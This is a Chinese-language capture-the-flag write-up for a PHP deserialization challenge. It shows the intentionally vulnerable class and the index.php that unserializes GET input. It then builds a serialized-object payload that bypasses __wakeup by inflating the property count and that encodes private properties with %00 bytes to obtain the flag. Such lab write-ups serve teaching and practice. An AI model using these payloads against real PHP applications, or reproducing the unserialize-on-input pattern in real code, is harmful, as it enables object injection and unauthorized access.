MENU

[BUU 极客大挑战 2019]PHP

September 27, 2020 • Read: 294 • CTF

题目给出提示:
因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯不愧是我!!!

尝试index.php.bak 没有发现
扫描了一下目录,有反爬机制全是429
不过还是扫出来了www.zip
QQ截图20200927122734.png

有个class.php,看来是反序列化了

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

在index.php中可以接收参数

 <?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

这题思路很简单,绕过__wakeup(),使username="admin",password="100".

知识盲区

这里有个知识点,php的三个类属性,public、private、protected
在序列化的时候
public会正常输出变量值,属性名 例如 username
private会加入类名和%00,%00类名%00属性名 例如 %00Name%00username
protected %00*%00属性名 例如 %00*%00username
%00在进行编码后会变为空字符,所以传入值的时候直接使用字符型会导致%00被解析为空字符,从而无法区分public还是private.

payload

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
}
echo serialize(new Name());

\\O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

通过修改属性数量绕过__wakeup,详细请看 php反序列化绕过__wakeup,即将2变为3

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

手动添加%00,使属性名满足private属性序列化规则,%00Name%00username

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

获取flag
QQ截图20200927132218.png

Last Modified: October 7, 2020